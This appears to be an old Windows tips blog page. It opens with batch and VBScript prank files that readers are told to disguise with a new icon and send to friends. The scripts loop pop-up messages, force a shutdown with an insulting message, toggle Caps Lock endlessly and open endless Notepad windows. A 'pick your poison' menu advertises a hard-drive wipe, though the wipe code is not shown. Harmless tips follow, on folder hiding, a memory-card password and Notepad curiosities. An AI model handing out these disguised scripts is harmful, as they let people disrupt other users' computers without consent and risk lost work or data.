1>
Cycle a message in your friend's computer:
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as "Anything.BAT" and send it.
2>
Convey your friend a lil' message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
3>
Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
9>
Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
ITS REALLY A MAGIC TRY IT
ITS REALLY A MAGIC TRY IT
For those using Windows, do the following:
1.) Open a new notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
SEE THE MAGIC........
Posted by SHRENIK at 6:14 AM 0 comments
Labels: FUN, NOTEPAD
MONDAY, MARCH 31, 2008
Trick to Show ur name after time in taskbar...
Hi freinds !
I m here to tell u a trick to add up ur name in place of AM and PM beside time and make urself to feel proud among ur group of frnds.
Its simple
Start -> Control Pannel -> Regional and LAnguage option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
IS it changed ??? Might be not ...Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY
LOCK UR FOLDER (VERY EASY NO SOFTWARE NEEDED )
How to Lock a Folder Using Notepad
1) Consider you want to lock a folder named abcd in your e:\, whose path is e:\abcd
2) Now open the Notepad and type the following
ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30 309D}
3) Where abcd is your folder name. Save the text file as loc.bat in the same drive.
4) Open another new notepad text file and type the following
ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30 309D} caclub
5) Save the text file as unloc.bat in the same drive.
---------
how to use it
---------
1) To lock the caclub folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
2) To unlock the folder click the unloc.bat file. Thus the folder will be unlocked and the contents are accessible.
UNLOCK UR MEMORY CARD WHEN U FORGOT UR PASSWORD.
Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.
So there are two types of methods for recovering the password of your memory card with the help of nokia phone.
For Nokia s60 1st and 2nd edition phones.
1. First Install FExplorer in your phone memory.
2. Got to drive C: , you will find a file called mmcstore
3. Send it to your pc directly and open it in notepad or rename the file.
4. At the end of the file you will find your password.
NOTEPAD "world trade centre trick".
--------------NOTEPAD "world trade centre trick"..---------------
Did you know that the flight number of the plane that had hit WTC ...on9/11 was Q33N ....Open your Notepad in ur computer and type the flightnumber i.e Q33N... Increase the Font Size to 72, Change the Font toWingdings. U will be amazed by the findings.
Hows That ???
CHECK UR Computer's performance?
Do u want to Monitor ur Computer's performance?
Go to:
>run
>Type: perfmon.msc
>Enter
.
what ever u type ur computer will speak
here is a trick to convert ur
TEXT to VOICE without any
software.
steps are
>go to run
>type
Control speech
>write any text
it will be converted to voice
No comments:
Post a Comment